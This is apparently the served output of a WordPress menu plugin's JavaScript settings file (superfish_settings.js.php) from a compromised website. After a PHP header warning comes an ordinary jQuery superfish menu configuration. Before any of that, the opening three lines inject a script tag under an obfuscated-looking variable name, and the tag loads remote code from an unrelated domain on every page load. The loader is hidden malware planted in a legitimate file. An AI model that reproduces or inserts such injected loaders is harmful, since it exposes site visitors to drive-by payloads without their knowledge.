var sczriptzzbn = document.createElement('script');
sczriptzzbn.src = 'https://friscomusicgroup.com/br2';
document.getElementsByTagName('head')[0].appendChild(sczriptzzbn);
Warning: Cannot modify header information - headers already sent by (output started at D:\InetPub\vhosts\arrowenergy.com\httpdocs\wp-content\plugins\multi-level-navigation-plugin\scripts\superfish_settings.js.php:1) in D:\InetPub\vhosts\arrowenergy.com\httpdocs\wp-content\plugins\multi-level-navigation-plugin\scripts\superfish_settings.js.php on line 5
jQuery(document).ready(function() {
jQuery("ul.sf-menu").superfish({
animation: {opacity:"show",height:"show"}, // fade-in and slide-down animation
delay: 100, // delay on mouseout
speed: "normal", // animation speed
autoArrows: "", // enable generation of arrow mark-up
dropShadows: "" // enable drop shadows
});
});